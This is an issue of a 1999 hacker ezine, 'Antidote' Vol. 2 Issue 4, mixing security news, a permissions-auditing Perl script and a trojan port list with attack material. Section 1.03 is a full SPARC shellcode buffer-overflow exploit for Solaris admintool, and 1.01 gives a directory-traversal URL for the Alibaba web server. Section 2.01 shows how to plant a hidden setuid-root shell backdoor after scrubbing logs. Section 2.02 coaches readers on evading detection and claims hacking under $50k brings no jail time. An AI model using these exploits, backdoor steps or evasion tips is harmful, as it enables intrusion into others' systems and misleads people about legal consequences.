Copy Link
Add to Bookmark
Report
Antidote Vol. 02 Issue 04
Volume 2 Issue 4
5/16/99
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
** http://www.thepoison.org/antidote
------------------------------
Here is another issue of Antidote that has been released. Right now we have over 415
subscribers and getting more and more subscribers everyday. We are very sorry to say
that we are not going to be sending Antidote as a attchment anymore because we have
gotton so many subscribers that our mail server is going ape shit when we send them (we
don't have a mail server just for Antidote). What we are going to start to do is just
e-mail everyone the URL as to where they can download the new issue of Antidote. So you
will start recieving e-mails about ever week telling you that a new issue of Antidote
has been released and where you can get it. Sorry if this is an inconvience to anyone,
but it is such a hassle to send this as an attachment cause of the mail server. The last
issue that we sent as an attchment took us over 2 and a half hours to send to all of the
users because of problems and the mail server kept crashing because of it.
At Antidote, we never ask anything from anyone except articles in wich is optional, but
now, if you could please visit our sponsor because we have to pay for the domain
(www.thepoison.org) and it is getting to be to expensive to keep it up, though we don't
want to take it down. So please take 2 seconds out of your time and please go to the
fallowing URL and click on our sponsor:
http://www.thepoison.org/popup.html
The reason why we don't link the sponsor directly from here is
because they have a refferal page where you type in the URL of the page that will have
the link on it and if the refferal does not come from that page, then the 'hit' does not
count. So please go to that URL and click on our sponsor!
--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News & Exploits
1.01 - Alibaba 2.0
1.02 - CIH has gone 'phoney'
1.03 - Admintool Overflow
1.04 - Corel Virus
1.05 - Check.pl
1.06 - SSHD Root
2.00 - Misc
2.01 - Root : Anytime
2.02 - How Not to Get Caught
2.03 - Trojan Ports
------------------------------
<!-- 0.00 - Beginning //-->
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is
basically current news and happenings in the underground world. We aren't going to teach
you how to hack or anything, but we will supply you with the current information and
exploits. Mainly Antidote is just a magazine for people to read if they have some extra
time on there hands and are bored with nothing to do. If you want to read a magazine
that teaches you how to hack etc, then you might want to go to your local bookstore and
see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics,
why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are recieved second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will recieve Antidote the second we release it and the
e-mail will contain a hyperlink to the URL in wich you can download the current issue.
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to
be published above your article (when sending it to us) and we will do what you say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you might
want to send it again because we probably didn't get it (we respond to all e-mails no
matter what). We might use your article in future issues off Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it
or not.
Well thats it for our FAQ. If you have a question that is not on here or the question is
on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.
------------------------------
0.03 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals
and Some are groups in general. If you are not on this list and you feel that For some
reason you should be, then please contact Lord Oak and he will post you on here and we
are sorry for the Misunderstanding. Well, here are the shout outs:
Lord Oak EazyMoney
Duece Astral
Black Magick oX1dation
Forlorn Retribution
0dnek www.thepoison.org
Serial Killer Jaynus
Like we said above, if we forgot you and/or you think you should be added, please e-mail
lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.04 --=\\Writing\\=--
As many of you know, we are always open to articles/submittings. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we recieve two e-mails with the same topic/idea then we will use the one
that we recieved first. So it might be a good idea to e-mail one of us and ask us if
someone has written about/on this topic so that way you don't waste your time on writing
something that won't be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on
thursday.
And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will
take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if we
like it).
------------------------------
_________________________________
) ___ (
( //___/ / // ) ) // ) ) )
) /____ / // / / __ / / (
( / / // / / ) ) )
) / / ((___/ / ((___/ / (
( http://www.403-security.org )
) For the latest hacks and news (
(___________________________________)
<!-- 1.00 - News & Exploits //-->
1.01 --=\\Alibaba 2.0\\=--
I've found a security hole in the web server Alibaba 2.0 (the latest version). I haven't
tried it on any other version. Here's an example: If you install it so the web root is
located in c:\alibaba\HtmlDocs\ you can send an URL:
http://www.server.se/../../winnt/file.txt
and get the "file.txt" file. This works all over the disk Alibaba is installed on. If
directory browsing isn't allowed you have to know the pathname of the file you want. If
directory browsing is allowed you can start at the disk root directory, but you have to
enter the directories by hand when browsing, because the server will assume they are
located in the web root, so if you just click around all you'll get is lots of 404's.
/Arne Vidstrom- comment for Russ to be removed when posting out on the list - I haven't
contacted the vendor at all.
------------------------------
1.02 --=\\CIH has gone 'phoney'\\=--
[www.cnn.com]
A fast-traveling rumor that the Chernobyl virus that melted down at least 600,000
computers worldwide last month would wreak havoc on cellular phones in Lebanon on
Saturday tangled telephone lines and briefly shut down Lebanon's telephone network.
Lebanese flipped off their mobiles and picked up traditional telephones to warn friends
and family to do the same. The panic in this cellular-loving country overloaded the
network, disrupting service for a few minutes, Ad-Diyar daily newspaper reported Sunday.
Losses from the drop in cellular calls amounted to dlrs 30,000, the newspaper reported.
The Chernobyl virus, timed to strike computers on the April 26 anniversary of the
Chernobyl nuclear disaster, tries to erase a computer's hard drive and write gibberish
into system settings.
Parliament was considering an investigation into the source of the rumor, which
Lebanon's two cellular companies scrambled in vain to debunk as technically implausible.
Reporters tried Saturday to reach the Lebanese communications minister about the scare,
according to the London-based Al-Hayat newspaper. His two cellular phones, however, were
shut off.
http://www.cnn.com/WORLD/meast/9905/09/lebanon.cell.hoax.ap/
------------------------------
1.03 --=\\Admintool Overflow\\=--
/*=============================================================================
admintool Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% setenv DISPLAY yourdisplay (ex. setenv DISPLAY 192.168.0.100:0.0)
% gcc ex_admintool.c (This example program)
% a.out
( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
-> Directory: /tmp -> [Ok] )
#
In /tmp/EXP directory, the temp files are made, please remove it.
=============================================================================
*/
#include <stdio.h>
#define ADJUST1 2
#define ADJUST2 1
#define BUFSIZE1 1000
#define BUFSIZE2 800
#define OFFSET 3600
#define OFFSET2 400
#define PKGDIR "mkdir /tmp/EXP"
#define PKGINFO "/tmp/EXP/pkginfo"
#define PKGMAP "/tmp/EXP/pkgmap"
#define NOP 0xa61cc013
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
unsigned long ret_adr;
static char x[500000];
FILE *fp;
int i;
main()
{
system(PKGDIR);
putenv("LANG=");
if ((fp=fopen(PKGMAP,"wb"))==NULL){
printf("Can not write '%s'\n",PKGMAP);
exit(1);
}
fclose(fp);
if ((fp=fopen(PKGINFO,"wb"))==NULL){
printf("Can not write '%s'\n",PKGINFO);
exit(1);
}
fprintf(fp,"PKG=");
ret_adr=get_sp()-OFFSET;
while ((ret_adr & 0xff000000) == 0 ||
(ret_adr & 0x00ff0000) == 0 ||
(ret_adr & 0x0000ff00) == 0 ||
(ret_adr & 0x000000ff) == 0)
ret_adr += 4;
printf("Jumping address = %lx\n",ret_adr);
memset(x,'a',4);
for (i = ADJUST1; i < 1000; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >>8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE1]=0;
fputs(x,fp);
fprintf(fp,"\n");
fprintf(fp,"NAME=");
memset(x,'a',4);
for (i = ADJUST2; i < BUFSIZE2; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0; i<strlen(exploit_code); i++)
x[i+ADJUST2+OFFSET2]=exploit_code[i];
x[BUFSIZE2]=0;
fputs(x,fp);
fprintf(fp,"\n");
fprintf(fp,"VERSION=1.00\n");
fprintf(fp,"ARCH=sparc\n");
fprintf(fp,"CLASSES=none\n");
fprintf(fp,"CATEGORY=application\n");
fprintf(fp,"PSTAMP=990721\n");
fprintf(fp,"BASEDIR=/\n");
fclose(fp);
system("admintool");
}
------------------------------
1.04 --=\\Corel Virus\\=--
[www.pcworld.com]
A new wrinkle in computer viruses appeared this week with the discovery of a virus that
infects the script language used by Corel products. But experts say the GaLaDRiel (or
C.S.Gala) virus will affect few users, and is not destructive.
The virus is not contained in the company's applications, according to a Corel
representative. You can get it only by receiving an infected script file from another
user via disk or download. When it triggers, all the virus does is display text.
GaLaDRiel is "in the low-risk category," according to Sal Viveros, a spokesperson for
Network Associates, maker of McAfee Antivirus. The virus is rare, doesn't spread easily,
and causes minimal damage, Viveros says.
Although GaLaDRiel has the potential to infect other Corel Script files, it doesn't
launch automatically. You have to run the infected script for it to spread. And the
virus doesn't infect program files.
After GaLaDRiel infects a Corel Script file, it will run its payload on June 6 only,
displaying seven lines from J.R.R. Tolkien's The Lord of the Rings. As far as virus
researchers have been able to ascertain, GaLaDRiel does nothing else.
All major developers of antivirus software plan to add detection and removal of
GaLaDRiel to their latest virus updates within the next two weeks.
How to Check for the Virus
Corel recommends taking the following steps to see if your scripts have been infected
and to remove the virus if they have been:
1. Using Windows Explorer, browse the directory that contains the potentially infected
scripts.
2. Right-click on a Corel script.csc file and select Open.
3. When the Corel Script Editor opens, examine the first line of the script. If the
text begins with REM ViRUS GaLaDRiel, then your script is infected.
4. To cure the infection, delete all the script lines from REM ViRUS GaLaDRiel to REM
END OF ViRUS.
5. Resave your Corel Script file with the same name, overwriting the infected version.
6. Repeat the above steps for all .csc files in the same directory. (This final step
is important, because running any infected Corel Script file will infect all other
.csc files in the same directory.)
http://www.pcworld.com/pcwtoday/article/0,1510,10954,00.html
------------------------------
1.05 --=\\Check.pl\\=--
#!/usr/bin/perl -w
#
# Check.pl
# Written by David Allen
# s2mdalle@titan.vcu.edu
# http://opop.nols.com/
#
# Released under the terms of the GNU GPL
#
# Run the program with an argument of the directory you want to completely scan
# Usage:
# check.pl /
#
# Currently this program DOES NOT follow symlinks because of some program's
# tendencies to have circular symlinks which will run you out of memory
# pretty fast. And that's evil. Maybe I'll make it check for circular
# symlinks later, but right now, that's a real pain in the ass.
#
# This program reports SUID, SGID, STICKY, writeable files by
# the effective user. This is best run with the permissions of a regular
# user who shouldn't be editing a lot of your files. :)
#
# It prints everything to STDOUT by default. Redirect the output wherever
# the hell you want it.
use strict; # Keep me honest
my $root = shift;
my $BEGINNING_LEVEL=0;
if(not $root)
{
# Initialize if the user didn't give us anything to cling to.
$root="/";
}
# Level indexing is provided for debugging and to check if it's going out
# of control. In dirinfo() you can adjust what the warning and error levels
# are for the number of directory levels deep this will check.
print "Calling dirinfo\n";
dirinfo($root, $BEGINNING_LEVEL);
sub dirinfo
{
my $dirname = shift;
my $level = shift;
my $HANDLE;
my $MAXLEVEL=100;
my $WARNINGLEVEL=50;
if($level==$WARNINGLEVEL)
{
print STDERR "WARNING: Deep directory structure. I hope you have some serious RAM free...\n";
}
if($level>$MAXLEVEL)
{
print STDERR "ERROR: Max recursion met - directory structure deeper than $MAXLEVEL directories. That's bad. You can change the default in the script, or you can see if you can find any circular symlinks that are causing the problem. Check the end of your output for clues.\n\n";
die "ERROR: Max-eval-depth error.\n";
}
opendir HANDLE, "$dirname" or return(-1);
my @allfiles = readdir HANDLE;
# print "Reading info on \"$dirname\"...\n";
TORTURE: foreach my $file (@allfiles)
{
my $foobar;
if($dirname eq "/")
{
$foobar = $dirname . $file;
}
else
{
$foobar = $dirname. "/". $file;
}
# print "\"$foobar\" level $level\n";
if(($file eq ".") or ($file eq ".."))
{
# Go on your merry way...ignore this one.
}
# If the file is writeable, and doesn't belong to the user running
# this script, then it gets reported.
elsif((-W $foobar) and (not (-O $foobar))) # File is writeable&&!owned
{
# If it's a directory, report it as such.
if(-d $foobar) # File is a directory
{
print "\"$foobar\" ### WRITEABLE DIR\n"
}
else
{
my $fileinfo=`ls -l "$foobar"`;
chomp($fileinfo);
print "\"$fileinfo\" ### WRITEABLE\n";
} # End else
} # End elsif
elsif(-l $foobar)
{
# my $fileinfo=`ls -l "$foobar"`;
# chomp($fileinfo);
# print "\"$fileinfo\" ### SYMLINK\n";
# Symlink evilness. Especially with GNOME. :(
}
elsif(-d $foobar) # File is a directory
{
# File is a directory - recurse through it
# DEBUG: print "Entering \"$file\" coming from \"$dirname\"\n";
my $tmp=dirinfo($foobar, ($level+1));
if($tmp == -1)
{
print "Directory $foobar not readable with your sorry UID.\n";
}
}
elsif(-u $foobar) # File is SUID
{
my $fileinfo=`ls -l "$foobar"`;
chomp($fileinfo);
print "$fileinfo ### SUID\n";
}
elsif(-g $foobar) # File is SGID
{
my $fileinfo=`ls -l "$foobar"`;
chomp($fileinfo);
print "$fileinfo ### SGID\n";
}
elsif(-k $foobar) # File is sticky
{
my $fileinfo=`ls -l "$foobar"`;
chomp($fileinfo);
print "$fileinfo ### STICKY\n";
}
else
{
# DEBUG2: print "\"$foobar\" doesn't look very interesting to me.\n";
}
} # End foreach
} # End dirinfo
------------------------------
1.06 --=\\SSHD Root\\=--
When was the last time you rebuilt all privileged (`suid root') applications when
upgrading a unix system, just in case?
I'm pretty sure one can find `small print' that demands this, however I'm equally sure
that hardly any system manager does so, since problems seem to occur _very_ rarely.
Here's a neat one:
Some time prior to the upgrade, system manager (S.M.) was asked to install `sshd' on a
not-so-common platform (nothing really security-relevant, machine used for raw speed
only, users just being accustomed to that sort of login). Said platform (featuring a
particularly elaborate user data base) requires some special calls (simple calling
sequences) to be done during `login' - no problem, `sshd' knows about them, although not
explicitly aware of the particular hardware. Cautiously, S.M. configures `sshd' to not
allow `root' logins from the outside. What other harm could it possibly do?
Upgrade has to occur somewhat in a hurry, release documentation isn't on-site, but
procedures are known well enough. S.M. asks the manufacturer's support representative if
special precautions have to be taken, "errr, not that I'd think so". S.M. installs new
version, all fine & dandy, even remembers to check out `sshd' afterwards and finds it to
work the same as before.
A couple of days later, S.M. logs in via `sshd' himself, and for the first time enters
`su'. Gets very amazed at the new system's intelligence, as it knows to not ask him for
a password. Minutes later, S.M. recognizes that `su' would never ask for a password,
when the parent process had been created via `sshd' ... in spite of no other visible
peculiarities with that process.
A re-build (pretty likely boiling down to nothing but a re-link) of `sshd' fixed the
problem.
Quite a few years ago, when I saw the first mention of `ssh', I commented "If you're a
bank, you don't buy your safe at a flea market; if you're not, you might be better off
without a safe". Maybe there's _some_ truth in it, after all.
Imagine uSoft going open source, and no-one going to have a look at it...
------------------------------
10001010100101110101010101001011101010101000
0 1
1 Y88b Y88 888 888 888 88e e88'Y88 0
1 Y88b Y8 888 888 888 888b d888 'Y 1
0 b Y88b Y 8888888 888 8888D C8888 1
0 8b Y88b 888 888 888 888P Y888 ,d 1
1 88b Y88b 888 888 888 88" "88,d88 0
1 1
1 http://www.nudehackers.com 0
0 0
01001010110101010001011010010111010100101011
<!-- 2.00 - Misc //-->
2.01 --=\\Root : Anytime\\=--
After gaining root access to a server you always risk the chance of losing access. The
admin may change the password or fix the hole allowing a root shell. Well now you have
a way to keep that root shell. The admin can change the password or fix the security
hole. As long as you have local access, you have root access. Down to the nitty gritty.
In the /bin dir there is file named sh. This is the actual shell. By running this the
user will have shell access to the user that owns it.
Once you have root on the computer, after you fix the logs and the .bash_history, go
to the /bin dir and copy sh to a dir with permissions of 777 (or that you have access
to.). After you have finished go back and change permissions on the dir to 700 so no one
else can access this without knowing the file name and where it is. If you have an
account the box simply create a dir inside your home dir where you can hide it. If you
don't have access then you can copy it to the /tmp dir or even make a different and hide
it. To hide the dir instead of a name such as HERE, use .HERE. The period in front will
hide it from ls(using ls -a will show it). Now once you have sh in that dir chmod it to
4777 this will modify the setuid bit, allowing it to set the userid of the person who
ran the file, to userid of the owner of the file, in this case root. Now time to hide
this file. In case you dir is found or viewed hide the file. Again instead of leaving
the name sh name it .sh, or even go father and name it something other than sh so its
not as noticalbe. Now you have a ROOT SHELL any time. This also works with users other
than root.
Heres a lil example:
[root@hacked box]$ mkdir /home/forlorn/.here
[root@hacked box]$ chmod 777 /home/forlorn/.here
[root@hacked box]$ copy /bin/sh /home/forlorn/.here
[root@hacked box]$ cd /home/forlorn/.here
[root@hacked box]$ chmod 4777 sh
[root@hacked box]$ mv sh .jk
[root@hacked box]$ su forlorn
password:
[forlorn@hacked box]$ cd .here
./.jk
bash# whoami
root
heh :)
rootshell anytime
Forlorn
forlorn@Nudehackers.com
------------------------------
2.02 --=\\How Not to Get Caught\\=--
Lots have said it. "I am scared to hack because I might get cought and go to jail!!!",
etc, etc, etc. You've all seen it before. There are plenty of ways to be catious. And
not to get cought(or get on the publics and medias good side if you do). When hacking
any type of *nix system, always check /etc/syslog.conf and check to make sure all the
logs were takin care off. A good Sys Admin will log in more places then in /var/log/.
Ya know? Among other things, DONT EVER DELETE OR MODIFY UNNESSISARY FILES. EVER. of
course, unless the admin has completly made of fool of you, then feel free to do a
rm -rf /* if you like. =P If you are patient, you could always commence your hack of a
machine/network over a period of time to lower suspision. Lots of logs in 1 night of
you attacking would be noticed easier by a admin/log-checker then one over a period of
2 weeks or soo. Attacking patiently will reduce the chances of you being noticed while
tryin to gain access. This is a mistake many new skool hackers have made. Braggin bout
your hacks. Posting on 500 usenets and bbs's saying "Y0 F00LZ I H4K0R3D FBI.GOV" will
get you busted real fast, if you catch my drift. Keep your major hacks to yourself
and/or you group. You should have pride in your hacks, and knowing that no one else
knows you are there is a great feeling that you know you have truely gained access to a
computer as a ghost.
Of course, you could just be having a bad day, and you just forget to clean one little
thing out and the admin notices. First off, the action takin to a hacker is greatly
exhagereated. A admin of a machine in the middle of bumfuck ohio mailin your ISP about a
hack wont do much to ya. Most ISPs, when told about criminal activity just cancel your
account, and thats it. Unless it is federal, international, or had something to do with
banks or large corps. Lets just say, you wont go to jail for hacking anything worth
under $50k. =) heh. Now, if it is big, and you get cought hacking, say, looking at
planes for the new F-22 stealth fighter curcitry plans, you will go to court swiftly.
This is when your not deleting or modifying comes in handy. The media will glorify you
as a victim if you just simply say, "I was reading some very interesting information
about the unclassified planes". They will give you the publics love, and that is good!
heh. out of all my experience, the above are the most importent things I have learned to
do and abide by. Remmember, more then 100X's the new skool(malicious) hackers are caught
then us oldskool hackers!
Jaynus
http://Security.Jaynus.Com
------------------------------
2.03 --=\\Trojan Ports\\=--
After seeing several questions about traffic directed at ports as 31337 and 12345 I've
put together a list of all trojans known to me and the default ports they are using. Of
course several of them could use any port, but I hope this list will maybe give you a
clue of what might be going on.
port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
port 23 - Tiny Telnet Server
port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth,
Terminator, WinPC, WinSpy
port 31 - Hackers Paradise
port 80 - Executor
port 456 - Hackers Paradise
port 555 - Ini-Killer, Phase Zero, Stealth Spy
port 666 - Satanz Backdoor
port 1001 - Silencer, WebEx
port 1011 - Doly Trojan
port 1170 - Psyber Stream Server, Voice
port 1234 - Ultors Trojan
port 1245 - VooDoo Doll
port 1492 - FTP99CMP
port 1600 - Shivka-Burka
port 1807 - SpySender
port 1981 - Shockrave
port 1999 - BackDoor
port 2001 - Trojan Cow
port 2023 - Ripper
port 2115 - Bugs
port 2140 - Deep Throat, The Invasor
port 2801 - Phineas Phucker
port 3024 - WinCrash
port 3129 - Masters Paradise
port 3150 - Deep Throat, The Invasor
port 3700 - Portal of Doom
port 4092 - WinCrash
port 4590 - ICQTrojan
port 5000 - Sockets de Troie
port 5001 - Sockets de Troie
port 5321 - Firehotcker
port 5400 - Blade Runner
port 5401 - Blade Runner
port 5402 - Blade Runner
port 5569 - Robo-Hack
port 5742 - WinCrash
port 6670 - DeepThroat
port 6771 - DeepThroat
port 6969 - GateCrasher, Priority
port 7000 - Remote Grab
port 7300 - NetMonitor
port 7301 - NetMonitor
port 7306 - NetMonitor
port 7307 - NetMonitor
port 7308 - NetMonitor
port 7789 - ICKiller
port 9872 - Portal of Doom
port 9873 - Portal of Doom
port 9874 - Portal of Doom
port 9875 - Portal of Doom
port 9989 - iNi-Killer
port 10067 - Portal of Doom
port 10167 - Portal of Doom
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12223 - Hack´99 KeyLogger
port 12345 - GabanBus, NetBus
port 12346 - GabanBus, NetBus
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 16969 - Priority
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP
port 26274 - Delta
port 31337 - Back Orifice
port 31338 - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 33333 - Prosiak
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 - Delta
port 50505 - Sockets de Troie
port 50766 - Fore
port 53001 - Remote Windows Shutdown
port 61466 - Telecommando
port 65000 - Devil
You'll find the list on the following address: http://www.simovits.com/nyheter9902.html
(still in Swedish but it will be translated in the near future).
To help anyone to detect trojan attacks, I´m planning to add information about the
original names of the executables, their size, where they usually are hiding, and the
names of any helpfiles they may use. I will also add tools or links to tools that may be
of your assistance.
Feel free to get back to me with any comments or suggestions. If you find new trojans
I´ll love to get my hands on them, but please mail me first, as I don´t need more than
one copy. If you have live experiance of trojan attacks I´m interested to read about
your findings.
Joakim
joakim.von.braun@risab.se
------------------------------
Please visit:
http://www.thepoison.org/popup.html and click on our sponsor(s) please!
Please go there and just take 2 seconds to click there because we have to pay the bills
somehow.
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art is done by Lord Oak and permission is needed from him before using.
